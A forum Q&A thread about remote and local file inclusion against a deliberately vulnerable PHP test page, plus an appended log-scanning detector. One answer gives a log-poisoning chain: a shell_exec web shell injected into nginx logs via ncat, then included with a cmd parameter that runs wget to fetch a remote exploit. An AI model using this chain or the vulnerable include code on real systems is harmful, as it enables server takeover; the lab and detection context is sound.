0

So I've hosted a php file vulnerable to RFI with code like this:

<?php

echo include($_GET['page']);

?>

However, when I try to exploit the code by visiting http://192.168.8.133/test.php?page=http://download850.mediafireuserdownload.com/w7tl7lq5agug/iwmmm0do3h6txy1/test.php, no PHP code gets executed. Am I missing something here? Or does apache2 have a configuration that prevents fetching of resources from external domains? LFI works perfectly fine though. But shouldn't RFI work as well with a simple code like that?

The file that I am trying to include has the following code:

<?php   
    echo 1;
?>
Lew Wei Hao

2 Answers

1

The allow_url_include is off for most of the hosts you will encounter. When you cannot use RFI (Remote File Inclusion) you could always try LFI (Local File Inclusion). The point is that you need to get some code stored on the server to execute.

If you have access to the logs you could try to inject PHP in the logs. A simple way is to connect via ncat to inject strings into the logs.

For HTTPS:

ncat -nvv --ssl hostname 443

Then it waits for input. As an example you could enter the following:

<?php echo shell_exec($_REQUEST['cmd'] ?>

In the logs you would see the bad request you sent to the webserver.

==> /var/log/nginx/access.log <==
xx.xx.xx.xx - - [28/Apr/2017:09:21:31 +0200] "<?php echo shell_exec($_REQUEST['cmd'] ?>" 400 173 "-" "-"

If you now include this logfile where you tried to include the URL, you might be able to download your URL using wget with something like the next request:

http://192.168.8.133/test.php?page=/var/log/nginx/access.log&cmd=wget%20http://url-to-download/exploit.php

This will only work if the host has not disabled the shell_exec() command, but this is less common than allow_url_include=0.

Yoram
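A detection-side view of the two log patterns described in the answer above, as an added example that is not part of the original post: it flags access-log lines that contain a PHP open tag and requests whose include parameter holds a URL/wrapper or a filesystem path. It assumes the nginx/Apache "combined" log format and the parameter name `page` from the question's test.php; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# "combined" format: ip - user [time] "request" status bytes "referer" "agent"
LINE_RE = re.compile(r'^\S+ \S+ \S+ \[[^\]]+\] "(.*)" \d{3} \S+ "[^"]*" "[^"]*"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.I)               # PHP open tag stored in the log
WRAPPER = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.I)   # http://, ftp://, php://, ...
INCLUDE_PARAMS = {"page"}  # assumption: query parameters that reach include()

def classify(line):
    """Return the findings for one access-log line."""
    findings = []
    if PHP_TAG.search(line):
        findings.append("php-tag-in-log")
    m = LINE_RE.match(line)
    parts = m.group(1).split(" ") if m else []
    if len(parts) != 3:          # unparsable line or malformed request line
        return findings
    for name, values in parse_qs(urlsplit(parts[1]).query).items():
        if name not in INCLUDE_PARAMS:
            continue
        for value in values:     # parse_qs has already percent-decoded these
            if WRAPPER.match(value):
                findings.append("remote-or-wrapper-include")
            elif value.startswith("/") or ".." in value:
                findings.append("path-include")
    return findings

def scan(lines):
    """Map 1-based line numbers to findings, skipping clean lines."""
    hits = {}
    for number, line in enumerate(lines, 1):
        found = classify(line.rstrip("\n"))
        if found:
            hits[number] = found
    return hits

# Constructed sample lines (documentation IP addresses, made-up host name).
SAMPLE = r'''
198.51.100.7 - - [28/Apr/2017:09:21:31 +0200] "<?php echo shell_exec($_REQUEST['cmd'] ?>" 400 173 "-" "-"
198.51.100.7 - - [28/Apr/2017:09:25:02 +0200] "GET /test.php?page=/var/log/nginx/access.log&cmd=x HTTP/1.1" 200 512 "-" "-"
198.51.100.7 - - [28/Apr/2017:09:26:40 +0200] "GET /test.php?page=http%3A%2F%2Ffiles.example%2Ftest.php HTTP/1.1" 200 90 "-" "-"
203.0.113.9 - - [28/Apr/2017:09:30:11 +0200] "GET /test.php?page=about.php HTTP/1.1" 200 431 "-" "-"
'''.strip().splitlines()

if __name__ == "__main__":
    for number, found in scan(SAMPLE).items():
        print(number, found)
```

A `php-tag-in-log` hit followed by a `path-include` hit that names the same log file is the sequence this answer describes.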
0

I realised that the settings in my php.ini file have "allow_url_include=0", which prevents remote URLs from being included even when there is no filter in place for the PHP code.

Lew Wei Hao